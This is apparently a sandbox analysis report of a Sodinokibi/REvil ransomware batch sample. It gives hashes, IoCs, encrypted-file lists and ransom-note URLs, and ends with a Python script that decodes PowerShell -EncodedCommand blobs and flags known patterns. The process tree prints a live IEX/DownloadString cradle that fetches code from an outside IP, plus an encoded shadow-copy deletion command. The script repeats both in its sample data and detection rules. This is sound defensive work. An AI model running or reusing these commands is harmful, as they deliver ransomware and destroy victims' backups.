Analysis
Max time kernel: 39s
Max time network: 59s
Platform: windows7_x64
Resource: win7v200430
Submitted: 02-06-2020 10:10
Static task: static1
Behavioral task: behavioral1
  Sample: 7dd11380f39c84448a7000c280f12a78.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 7dd11380f39c84448a7000c280f12a78.bat
  Resource: win10v200430
General
Target: 7dd11380f39c84448a7000c280f12a78.bat
Size: 219B
MD5: 694736c7cc588c0f7d4fea15b4f4e074
SHA1: 322715308f98b4e097a6e8eb88c84cd75e6dffa3
SHA256: 45b6d83a99693328a71a689d57f8b722e4e74c34b984569bec15e1108852bebc
SHA512: c93891f9542c5b111d290df367ff1019cc46f5b23f32df4b83989ba23a79215906029cbe2568c45f4226e650d3c55e50dcf6a5dd6fb382721e99f6da47bdd3d8
Malware Config
Extracted
  URL: http://185.103.242.78/pastes/7dd11380f39c84448a7000c280f12a78
Extracted
  Path: C:\7vaglni2z0-readme.txt
  Family: sodinokibi
  URLs:
    http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/BD0ED380483BE43E
    http://decryptor.cc/BD0ED380483BE43E
Signatures
Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  PID 1540 powershell.exe
Suspicious use of WriteProcessMemory (5 IoCs)
  PID 1416 cmd.exe wrote to memory of PID 1540 powershell.exe
  PID 1540 powershell.exe wrote to memory of PID 1032 powershell.exe (4 entries)
Suspicious behavior: EnumeratesProcesses (77 IoCs)
  PID 1540 powershell.exe (75 entries)
  PID 1032 powershell.exe (2 entries)
Blacklisted process makes network request (1 IoC)
  flow 3, PID 1540 powershell.exe
Modifies service (2 TTPs, 4 IoCs)
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer
  vssvc.exe: Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  powershell.exe: Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7fs3r6d.bmp"
Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Token: SeDebugPrivilege, PID 1540 powershell.exe (2 entries)
  Token: SeDebugPrivilege, PID 1032 powershell.exe
  Token: SeBackupPrivilege, PID 1776 vssvc.exe
  Token: SeRestorePrivilege, PID 1776 vssvc.exe
  Token: SeAuditPrivilege, PID 1776 vssvc.exe
  Token: SeTakeOwnershipPrivilege, PID 1540 powershell.exe
Enumerates connected drives (3 TTPs)
Drops file in Program Files directory (35 IoCs)
  All entries by powershell.exe:
  File opened for modification \??\c:\program files\HideSwitch.3gp2
  File opened for modification \??\c:\program files\FindUnlock.midi
  File opened for modification \??\c:\program files\AddComplete.WTV
  File opened for modification \??\c:\program files\ClearEnable.vb
  File opened for modification \??\c:\program files\EnableWrite.kix
  File opened for modification \??\c:\program files\RenameDebug.css
  File opened for modification \??\c:\program files\SendEdit.7z
  File created \??\c:\program files (x86)\7vaglni2z0-readme.txt
  File opened for modification \??\c:\program files\EditResume.DVR
  File opened for modification \??\c:\program files\FindSelect.wmf
  File opened for modification \??\c:\program files\OpenGet.mp3
  File opened for modification \??\c:\program files\PingHide.ppt
  File opened for modification \??\c:\program files\RevokeInvoke.AAC
  File opened for modification \??\c:\program files\SaveClose.crw
  File opened for modification \??\c:\program files\SetRestore.xml
  File opened for modification \??\c:\program files\CompressSend.asx
  File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\7vaglni2z0-readme.txt
  File opened for modification \??\c:\program files\CompressRepair.js
  File created \??\c:\program files\microsoft sql server compact edition\7vaglni2z0-readme.txt
  File opened for modification \??\c:\program files\OptimizeRemove.xltx
  File opened for modification \??\c:\program files\PushRepair.clr
  File opened for modification \??\c:\program files\ResolveSearch.vdw
  File opened for modification \??\c:\program files\SplitConfirm.snd
  File opened for modification \??\c:\program files\DismountRestart.vbe
  File opened for modification \??\c:\program files\PublishStop.pdf
  File opened for modification \??\c:\program files\ResizeUnlock.m4a
  File opened for modification \??\c:\program files\SubmitReceive.vdw
  File created \??\c:\program files\7vaglni2z0-readme.txt
  File opened for modification \??\c:\program files\RenameExit.jpg
  File opened for modification \??\c:\program files\WriteShow.DVR-MS
  File opened for modification \??\c:\program files\BackupTrace.emz
  File opened for modification \??\c:\program files\MergeInitialize.svg
  File opened for modification \??\c:\program files\MoveCompress.pptm
  File created \??\c:\program files\microsoft sql server compact edition\v3.5\7vaglni2z0-readme.txt
  File opened for modification \??\c:\program files\ConvertToProtect.i64
Processes
C:\Windows\system32\cmd.exe (PID 1416)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\7dd11380f39c84448a7000c280f12a78.bat"
  Signatures:
    Suspicious use of WriteProcessMemory
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1540, child of 1416)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/7dd11380f39c84448a7000c280f12a78');Invoke-GLRLIILZKEHV;Start-Sleep -s 10000"
    Signatures:
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious use of WriteProcessMemory
      Suspicious behavior: EnumeratesProcesses
      Blacklisted process makes network request
      Sets desktop wallpaper using registry
      Suspicious use of AdjustPrivilegeToken
      Drops file in Program Files directory
    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1032, child of 1540)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      Signatures:
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\vssvc.exe (PID 1776)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
    Modifies service
    Suspicious use of AdjustPrivilegeToken
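The base64 blob handed to the child powershell.exe with -e is a UTF-16LE script, not plain ASCII; decoded it reads Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}, the shadow-copy wipe that is consistent with the vssvc.exe start and the SeBackupPrivilege/SeRestorePrivilege entries in the token signature. The Python below is an added example for this report (not part of the Triage output or of the sample) that decodes -EncodedCommand payloads from the command lines in the process tree above and flags shadow-copy deletion and the IEX/DownloadString cradle. The three command lines are copied from this report; the rule names, the set of accepted -EncodedCommand abbreviations and the tokenizer are the author's assumptions.

```python
"""Decode powershell.exe -EncodedCommand payloads from sandbox process-tree
command lines and flag shadow-copy deletion and download cradles.

Added example for this report; not part of the Triage output or the sample."""
import base64
import binascii
import re

# Constructed sample input: the three command lines from the process tree in
# this report. The base64 blob is copied verbatim from the PID 1032 entry.
SAMPLE_COMMAND_LINES = [
    'cmd /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\7dd11380f39c84448a7000c280f12a78.bat"',
    'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "IEX (New-Object '
    "System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/"
    "7dd11380f39c84448a7000c280f12a78');Invoke-GLRLIILZKEHV;Start-Sleep -s 10000\"",
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==",
]

# Assumed set: powershell.exe accepts any prefix of -EncodedCommand (-e, -en,
# -enc, ...) plus the -ec alias. -ExecutionPolicy is deliberately not in the
# set, so a following 'Bypass'/'Unrestricted' is never mistaken for a payload.
_ENC_FLAGS = {"encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)} | {"ec"}

# Assumed rule names. The patterns cover the three common shadow-copy wipes
# and the IEX + DownloadString cradle seen in the PID 1540 command line.
INDICATOR_RULES = {
    "shadow_copy_delete_wmi": re.compile(r"win32_shadowcopy.*?\.delete\s*\(", re.I | re.S),
    "shadow_copy_delete_vssadmin": re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "shadow_copy_delete_wmic": re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "download_cradle": re.compile(
        r"(?=.*(?:\biex\b|invoke-expression))(?=.*downloadstring)", re.I | re.S),
}


def _tokens(cmdline):
    """Minimal Windows command-line split: a double-quoted run is one token."""
    return re.findall(r'"[^"]*"|\S+', cmdline)


def decode_encoded_command(cmdline):
    """Return the script behind -e/-enc/-EncodedCommand, or None if the flag
    is absent or the argument is not valid base64-wrapped UTF-16LE."""
    toks = _tokens(cmdline)
    for i, tok in enumerate(toks[:-1]):
        if tok[:1] in ("-", "/") and tok[1:].lower() in _ENC_FLAGS:
            blob = toks[i + 1].strip('"')
            try:
                return base64.b64decode(blob, validate=True).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def indicators(command_text):
    """Names of INDICATOR_RULES that match the given plain command text."""
    return sorted(name for name, rx in INDICATOR_RULES.items() if rx.search(command_text))


def analyse_process_tree(cmdlines):
    """Decode each command line and merge indicators from the raw line and
    from the decoded payload, so an encoded wipe is not missed."""
    results = []
    for line in cmdlines:
        decoded = decode_encoded_command(line)
        hits = set(indicators(line))
        if decoded:
            hits |= set(indicators(decoded))
        results.append({"cmdline": line, "decoded": decoded, "indicators": sorted(hits)})
    return results


if __name__ == "__main__":
    for r in analyse_process_tree(SAMPLE_COMMAND_LINES):
        print(r["indicators"] or "-", "|", r["decoded"] or r["cmdline"][:70])
```

Running the script prints one line per process: nothing for the cmd.exe launcher, download_cradle for the PID 1540 stager, and shadow_copy_delete_wmi for PID 1032 alongside the decoded text. Matching on the raw line alone would have missed the wipe, which is the point of decoding before applying the rules; the vssadmin and wmic variants are included because other Sodinokibi droppers use them in place of the WMI call.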